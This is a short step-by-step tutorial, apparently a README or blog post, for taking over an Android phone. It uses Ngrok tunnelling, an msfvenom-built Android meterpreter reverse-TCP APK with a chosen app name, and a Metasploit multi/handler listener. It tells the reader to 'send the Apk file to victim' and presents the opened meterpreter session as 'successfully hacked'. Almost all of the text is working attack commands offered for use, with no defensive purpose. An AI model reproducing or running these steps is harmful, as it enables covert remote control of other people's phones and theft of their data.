Install Ngrok for your platform
Visit Ngrok official site : https://ngrok.com/
Install Ngrok for Termux video : https://www.youtube.com/watch?v=mdeNFMVI0P8&lc=z23ci5oaklvmh1yrc04t1aokgzsccuhvim13dwgsu1iark0h00410
Install Metasploit in Termux And Hacking mobile to mobile video uploaded
link : https://youtu.be/QkWk6MHgMbY
Run your Ngrok
For Kali Linux [ ./ngrok tcp 4444 ]
For Termux [ ./ngrok tcp 4444 ]
For Windows [ ngrok tcp 4444 ]
Now create payload
Command : msfvenom -p android/meterpreter/reverse_tcp LHOST= ngrokip LPORT= ngrokport R>appname.apk
- Run this command and wait for 2 mints.
- Now payload was created
- open your [ Metasploit-framework/bin/ ] Folder check your Apk file
- Now send the Apk file to victim
Now Open Metasploit Framework
- Open command prompt in this path [ Metasploit-framework/bin/ ]
- msfconsole (if not work give this command msfconsole.bat )
- Now Metasploit framework opened
- use exploit/multi/handler
- set payload android/meterpreter/reverse_tcp
- set LHOST localhost
- set LPORT 4444
- exploit
- Now started reverse tcp handler : 4444
Now server waiting for victim interaction. Victim installed and opened the App meterpreter session 1 opened. (successfully hacked )
Now Meterpreter Commands
- Type 'help' to know all commands.